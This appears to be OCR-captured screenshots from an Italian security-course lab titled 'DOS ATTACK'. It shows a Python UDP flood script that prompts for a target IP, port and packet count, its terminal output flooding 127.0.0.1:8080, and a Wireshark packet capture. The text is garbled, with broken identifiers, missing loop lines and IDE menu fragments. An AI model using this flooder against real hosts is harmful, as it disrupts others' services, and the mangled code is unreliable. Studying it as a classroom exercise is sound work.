```
rminal Help
                      def udp_flood(target_ip, target_port, num_packets):
                               sock = socket.socket(socket.AF INET, socket.SOCK DGRAM)
                               packet = random.randbytes(packet_size)
                                       sock.sendto(packet, (target ip, target_port))
print(f"Pacchetto {i+1} inviato a {target_ip}:{target_port}")
                     if __name__ == "__main__":
    # Richiedere i dati all'utente
    target_ip = input("Inserisci l'IP target: ")
    target port = int(input("Inserisci la porta target: "))
    num_packets = int(input("Inserisci il numero di pacchetti da inviare: "))
                       udp_flood(target_ip, target_port, num_packets)
                                                                                                                                           암 StopAsyncIteration

    StopIteration
    SyntaxError

                                                                                                                                            SyntaxWarning
                                                                                                                                           % SystemError
% SystemExit
{} socket
                                                                                                                                            🔁 set

★ staticmethod

        PROBLEMS 2 OUTPUT DEBUG CONSOLE TERMINAL PORTS
       Pacchetto 86 inviato a 127.0.0.1:8080
Pacchetto 87 inviato a 127.0.0.1:8080
Pacchetto 88 inviato a 127.0.0.1:8080
Pacchetto 89 inviato a 127.0.0.1:8080
Pacchetto 90 inviato a 127.0.0.1:8080
Pacchetto 91 inviato a 127.0.0.1:8080
Pacchetto 92 inviato a 127.0.0.1:8080
Pacchetto 93 inviato a 127.0.0.1:8080
Pacchetto 94 inviato a 127.0.0.1:8080
Pacchetto 95 inviato a 127.0.0.1:8080
Pacchetto 96 inviato a 127.0.0.1:8080
Pacchetto 97 inviato a 127.0.0.1:8080
Pacchetto 99 inviato a 127.0.0.1:8080
Pacchetto 99 inviato a 127.0.0.1:8080
Pacchetto 100 inviato a 127.0.0.1:8080
         Pacchetto 86 inviato a 127.0.0.1:8080
         ___(kali⊛kali)-[~/Desktop/S3L5 - DOS ATTACK]
```

No. Time	Source	Destination		Length Info		
	127.0.0.1	127.0.0.1	ICMP	590 Destination unreachab		
45 0.000000000		127.0.0.1	UDP	1066 52079 - 8080 Len=1024		
46 0.000000000		127.0.0.1	UDP	598 Destination unreachab		
47 0.0000000000		127.0.0.1	ICMP	1066 52079 → 8080 Len=1024 598 Destination unreachab		
49 0,0000000000		127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
50 0.000000000	127.0.0.1	127.0.0.1	ICMP	590 Destination unreachab		
51 0.000000000		127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
52 0.000000000		127.0.0.1	ICMP	590 Destination unreachab		
53 0.0000000000		127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
54 0.080080080		127.0.0.1	ICMP	590 Destination unreachab		
55 0.080080080	127.0.0.1	127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
56 0.080080080	127.0.0.1	127.0.0.1	ICMP	590 Destination unreachab	le (Port unreachable)	
	127.0.0.1	127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
58 0.080080080		127.0.0.1	ICMP	590 Destination unreachab		
59 0.080080080	127.0.0.1	127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
60 0.080080080	127.0.0.1	127.0.0.1	ICMP	598 Destination unreachab		
61 0.000000000		127.0.0.1	UDP	1066 52079 - 8080 Len=1024		
	127.0.0.1	127.0.0.1	ICMP	590 Destination unreachab		
63 0.080080080	127.0.0.1	127.0.0.1	UDP	1066 52079 - 8080 Len=1024		
64 8.989989989		127.0.0.1	ICMP	590 Destination unreachab		
65 0.000000000		127.0.0.1	UDP	1066 52079 - 8080 Len=1024		
66 0.000000000		127.0.0.1	ICMP	598 Destination unreachab		
67 0.080080080	127.0.0.1	127.0.0.1	UDP	1066 52079 - 8080 Len=1024 598 Destination unreachab		
69 0,000000000		127.0.0.1 127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
70 0.0000000000		127.0.0.1	ICMP	590 Destination unreachab		
71 0,000000000		127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
72 0.000000000		127.0.0.1	ICMP	590 Destination unreachab		
73 0.0000000000		127.0.0.1	UDP	1066 52079 → 8080 Len=1024		
74 0.0000000000		127.0.0.1	ICMP	590 Destination unreachab		
75.0.000000000	127 8 8 1	127 0 0 1	HIDD	1066 52079 . 8080 Len=1024	(	
. France 1. 1066 button	on wire (8528 bits), 1866 bytes cap	turned (OEOO bits) on		1- 44.0		0020 00 01 cb 6f 1f 90 04 08 02 1c 9e f2 1a 08 69 b3
	0:00:00 00:00:00:00:00:00:00:00:00:					0020 c1 7e c4 1f fb 82 8c 1a 3a 58 cf d2 d2 87 ba de
	ersion 4, Src; 127.0.0.1, Dst; 127.0		.00 (00.00	0.00.00.00.00)		0340 75 a5 4a 8c 78 84 b6 52 ea 10 70 ec b5 bf 6a b8 u J x R p j
	col. Src Port: 52079, Dst Port: 8080					0350 75 71 54 dc a8 bb 68 59 d9 88 bd a6 9d d9 ae e8 ugT hP
- Data (1024 bytes)	300, 010 10101 02010, 000 10101 0000					0860 59 3a 52 a4 8e 4a 53 dd b8 c2 fb fe be 32 ab 94 P:R JS2.
	9ef21a0869b3c17ec41ffb028c1a3a58cfd	12d287bade75a54a8c7884	h652ea187	0ecb5bf6ab8757154dca8bb6850c	1088bda69dd9aee8503a52a4	
[Length: 1024]						0880 b2 ba 65 45 c6 6a 3d 19 98 b6 63 a2 28 98 7d 84 ··eE.j=···c.(-}-
						0090 ee e2 85 25 b6 d8 86 b6 c4 98 70 e2 3f e5 79 a9 ···%····p·?·ý·
						00a0 44 ed 86 b7 dc db 46 fa 6e cd 55 68 11 44 34 2e DF. n.Uh.D4.
						08b0 f3 b1 9c 7d 4b cf 90 ec 6b 2c d9 d2 11 ca 25 87 ···}K····k,···%·
						00c0 37 1d 69 49 2e 3a 6f 5c d3 ca 43 2f cc ee d3 f6 7·iI.:o\ ··C/····
						00d0 d1 eb 74 f4 05 2d 98 25 ca 19 1e 92 b3 34 e8 e9 ··t·% ····-4··
						00e0 ce 2f d0 b0 7e 3b 12 d2 0d 7c a8 72 d2 2e 2d 01 -/; -r
						00f0 13 02 9c 82 5e 86 14 70 e6 44 18 ae ed f3 de 3b ····^-p D····;
						0100 1a 33 39 4c ca 2a 90 fb 2d 15 c3 63 93 b6 8c 6b 39L c - k
						0110 42 a8 d9 e5 fa e0 bf 2f 10 10 16 01 78 4d ed 1d B/xM
						0120 9b b3 24 21 94 94 7e d2 1f 5f c0 8c 5b fc 4f 7a \$\ \\$! \ \tag{012} \ \[ \] 0z
						0130 dc 27 b6 ba a2 29 d8 81 b3 9a fd 9c fa 87 53 98 ')